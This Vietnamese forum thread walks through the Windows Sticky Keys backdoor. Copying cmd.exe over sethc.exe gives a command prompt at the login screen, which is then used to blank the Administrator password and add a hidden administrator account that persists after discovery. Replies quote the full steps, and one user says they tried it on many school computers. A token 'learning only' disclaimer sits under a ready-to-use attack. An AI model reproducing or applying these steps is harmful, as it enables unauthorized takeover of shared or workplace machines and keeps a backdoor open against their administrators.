Lanny

New Member
Bước 1:

Run: cmd

gõ vào các dòng lệnh sau: (khuyến khích nên gõ cho quen lệnh)

cd %systemroot%/system32 //vào thư mục system32
rename sethc.exe sethc.exe.bak //đổi tên sethc.exe thành sethc.bak
copy cmd.exe sethc.exe /y //thay thế file sethc.exe bằng file cmd.exe


(hay mở Notepad, paste đoạn mã trên vào và lưu lại với tên là *****.cmd Sau đó nhấp kép chuột lên file *****.cmd để thực thi.)


Bước 2:


Log off user đang dùng (Guest hay Limited user),từ cửa sổ chờ Login vào Windows, nhấp phím Shift 5 lần, nếu chương trình Command Prompt được gọi thay vì StickyKey thì bạn vừa thành công!

Chương trình StickyKey vừa được thay bằng hộp thoại Command Line



Ở cửa số Command Prompt này chúng ta sẽ có toàn quyền biến đổi tùy ý các Users có trên máy!


Bước 3:Một số lệnh Command:


Xem những user nào hiện có trên máy (kể cả các user ần)

net user


Xóa trắng password của Administrator(hay tương tự với bất kì user nào):

net user Administrator cái này thì không nên tí nào! dễ lộ lắm!hehe..


Thêm tài khoản Kendy với pw là happend vào hệ thống

net user Kendy happend /add


Gán tài khoản Kendy vào nhóm Quản Trị :

net localgroup Administrators Kendy /add


Sau khi thực hiện các lệnh trên thì Kendy vừa là một thành viên của Administrators,có thể đăng nhập vào hệ thống mà không cần khởi động lại máy.


Với những Quản Trị Viên chuyên nghề thì sẽ biết có sự tồn tại của Profile mới làm ra (tạo) nhưng cmd.exe vừa đổi tên thành sethc.exe vẫn còn trong System32, thì chúng ta vẫn còn nắm quyền kiểm soát

Bài viết chỉ mang tính chất trao đổi, học hỏi. Không khuyến khích anh em áp dụng phá hoại máy tính người khác.
 
amit nói hìnhcoi nhưchưa chính xác lắm,sau khi gõ lệnh làm ra (tạo) tài khoảng rồi thì phải khởi động lại, lúc này mới thấy tài khoảng mới đó dc
 

Sydney

New Member
Không phải khởi động lại đâu bạn. Mình vừa làm thử với rất nhìu máy ở trường mình.
 

huahaonam2008

New Member
Không biết Pro làm như thế nào chứ với quyền của User Limit đang dùng - để Rename File trong System32(Phân vùng hệ thống) thì không thể nào

amit_itqn Bước 1:


Run: cmd


gõ vào các dòng lệnh sau: (khuyến khích nên gõ cho quen lệnh)

cd %systemroot%/system32 //vào thư mục system32
rename sethc.exe sethc.exe.bak //đổi tên sethc.exe thành sethc.bak
copy cmd.exe sethc.exe /y //thay thế file sethc.exe bằng file cmd.exe



(hay mở Notepad, paste đoạn mã trên vào và lưu lại với tên là *****.cmd Sau đó nhấp kép chuột lên file *****.cmd để thực thi.)



Bước 2:



Log off user đang dùng (Guest hay Limited user),từ cửa sổ chờ Login vào Windows, nhấp phím Shift 5 lần, nếu chương trình Command Prompt được gọi thay vì StickyKey thì bạn vừa thành công!


Chương trình StickyKey vừa được thay bằng hộp thoại Command Line




Ở cửa số Command Prompt này chúng ta sẽ có toàn quyền biến đổi tùy ý các Users có trên máy!



Bước 3:Một số lệnh Command:



Xem những user nào hiện có trên máy (kể cả các user ần)

net user



Xóa trắng password của Administrator(hay tương tự với bất kì user nào):

net user Administrator cái này thì không nên tí nào! dễ lộ lắm!hehe..



Thêm tài khoản Kendy với pw là happend vào hệ thống

net user Kendy happend /add



Gán tài khoản Kendy vào nhóm Quản Trị :

net localgroup Administrators Kendy /add



Sau khi thực hiện các lệnh trên thì Kendy vừa là một thành viên của Administrators,có thể đăng nhập vào hệ thống mà không cần khởi động lại máy.



Với những Quản Trị Viên chuyên nghề thì sẽ biết có sự tồn tại của Profile mới làm ra (tạo) nhưng cmd.exe vừa đổi tên thành sethc.exe vẫn còn trong System32, thì chúng ta vẫn còn nắm quyền kiểm soát

Bài viết chỉ mang tính chất trao đổi, học hỏi. Không khuyến khích anh em áp dụng phá hoại máy tính người khác.
 
mình thử rùi, tới bước



đổi tên sethc.exe thành sethc.bak



thì k được, máy công ty mình cực kỳ bảo mật, không thay đổi hay xóa bất cứ thứ gì trong ổ C ngoại trừ desktop có thể copy và xóa file vừa copy
 

Kiến thức bôn ba

Các chủ đề có liên quan khác

Top